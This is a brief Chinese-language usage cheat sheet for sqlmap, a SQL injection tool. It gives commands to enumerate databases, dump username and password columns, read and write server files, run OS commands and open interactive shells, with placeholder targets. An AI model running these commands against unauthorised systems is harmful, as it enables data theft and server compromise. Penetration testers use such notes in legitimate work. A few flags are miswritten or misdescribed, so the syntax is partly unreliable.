sqlmap是一款强大的开源渗透测试工具,专门用于自动化检测和利用SQL注入漏洞,并能够完全控制数据库服务器
它支持广泛的数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server等
查询用法
sqlmap -u "url" --current-db //url带参数,查询库名
sqlmap -u "url" --tables -D "库名"//查询表名
sqlmap -u "url" --columns -T "表名"//查询列名
sqlmap -u "url" --dump -C "username,password" -T "表名"//查询数据
控制用法
sqlmap -u "url" --is-dba//确认是高权限用户
sqlmap -u "url" --file-read "服务器路径上的文件"//读
sqlmap -u "url" --file-write cc.txt "cc.txt的路径" --file-dest "服务器上路径.jh.txt"//写
-os-cmd=想输入的命令//操作
--os-shell --sql-shell//交互
提交方法
-data "url"//post注入
-cookie "url"//cookie注入
推荐使用-r